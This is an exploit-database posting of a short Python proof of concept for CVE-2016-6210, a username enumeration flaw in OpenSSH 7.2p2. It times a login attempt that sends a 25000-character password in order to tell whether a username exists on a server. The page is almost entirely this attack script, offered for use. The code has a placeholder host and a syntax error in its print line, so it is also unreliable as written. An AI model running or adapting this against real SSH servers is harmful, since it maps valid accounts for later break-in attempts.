OpenSSHD 7.2p2 - User Enumeration Exploit



EKU-ID: 5797 CVE: 2016-6210 OSVDB-ID:
Author: expku Published: 2016-08-23 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


#!/usr/bin/python
import paramiko
import time
user=raw_input("Enter user name: ")
p='A'*25000
ssh = paramiko.SSHClient()
startTime=time.clock()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
try:
    ssh.connect(ENTER SSH SERVER, username=user, password=p)
except:
    endTime=time.clock()
total=endTime-startTime
print ("Response time: %s", %total )